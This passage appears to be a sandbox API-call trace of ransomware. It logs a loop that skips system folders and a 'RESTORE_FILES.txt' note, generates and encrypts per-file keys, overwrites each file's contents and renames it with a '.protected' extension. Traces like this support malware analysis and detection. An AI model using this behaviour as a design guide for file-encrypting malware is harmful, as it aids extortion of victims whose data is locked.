(lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="Program Files (x86)") returned -1 [0089.037] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="$Recycle.bin") returned 1 [0089.037] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="System Volume Information") returned -1 [0089.037] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned 152 [0089.037] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpSrch=".protected") returned 0x0 [0089.037] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="RESTORE_FILES.txt") returned -1 [0089.037] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.037] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.038] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned 152 [0089.038] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpSrch=".txt") returned 0x0 [0089.038] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned 152 [0089.038] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpSrch=".rar") returned 0x0 [0089.038] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned 152 [0089.038] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpSrch=".zip") returned 0x0 [0089.038] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.039] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.039] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.039] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.039] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.039] WriteFile (in: hFile=0x150, 
lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.039] CloseHandle (hObject=0x150) returned 1 [0089.039] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E.protected") returned 162 [0089.040] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e.protected")) returned 1 [0089.040] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.040] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="Windows") returned -1 [0089.040] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="Program Files") returned -1 [0089.041] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="Program Files (x86)") returned -1 [0089.041] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="$Recycle.bin") returned 1 [0089.041] lstrcmpiW 
(lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="System Volume Information") returned -1 [0089.041] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned 152 [0089.041] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpSrch=".protected") returned 0x0 [0089.041] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="RESTORE_FILES.txt") returned -1 [0089.041] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.041] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned 152 [0089.042] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpSrch=".txt") returned 0x0 [0089.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned 152 [0089.042] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpSrch=".rar") returned 0x0 [0089.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned 152 [0089.042] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpSrch=".zip") returned 0x0 [0089.042] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.043] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.043] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.046] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.046] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.046] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.046] CloseHandle (hObject=0x150) returned 1 [0089.046] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4.protected") returned 162 [0089.046] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4.protected")) returned 1 [0089.047] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.047] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="Windows") returned -1 [0089.047] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="Program Files") returned -1 [0089.047] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="Program Files (x86)") returned -1 [0089.047] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="$Recycle.bin") returned 1 [0089.047] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="System Volume Information") returned -1 [0089.047] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned 152 [0089.047] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpSrch=".protected") returned 0x0 [0089.047] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="RESTORE_FILES.txt") returned -1 [0089.047] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.047] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned 152 [0089.048] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpSrch=".txt") returned 0x0 [0089.048] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned 152 [0089.048] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpSrch=".rar") returned 0x0 [0089.048] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned 152 [0089.048] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpSrch=".zip") returned 0x0 [0089.048] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.049] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.049] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.049] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.049] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.050] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.050] CloseHandle (hObject=0x150) returned 1 [0089.050] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778.protected") returned 162 [0089.050] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778.protected")) returned 1 [0089.050] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.050] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="Windows") returned -1 [0089.050] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="Program Files") returned -1 [0089.050] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="Program Files (x86)") returned -1 [0089.050] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="$Recycle.bin") returned 1 [0089.050] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="System Volume Information") returned -1 [0089.051] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned 152 [0089.051] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpSrch=".protected") returned 0x0 [0089.051] lstrcmpW 
(lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="RESTORE_FILES.txt") returned -1 [0089.051] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.051] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.051] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned 152 [0089.051] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpSrch=".txt") returned 0x0 [0089.051] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned 152 [0089.051] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpSrch=".rar") returned 0x0 [0089.051] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned 152 [0089.051] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpSrch=".zip") returned 0x0 [0089.051] ReadFile 
(in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.052] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.052] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.052] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.052] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.052] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.052] CloseHandle (hObject=0x150) returned 1 [0089.052] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED.protected") returned 162 [0089.052] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed.protected")) returned 1 [0089.053] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.053] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="Windows") returned -1 [0089.053] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="Program Files") returned -1 [0089.053] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="Program Files (x86)") returned -1 [0089.053] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="$Recycle.bin") returned 1 [0089.053] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="System Volume Information") returned -1 [0089.053] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned 152 [0089.053] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpSrch=".protected") returned 0x0 [0089.053] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="RESTORE_FILES.txt") returned -1 [0089.053] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.053] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
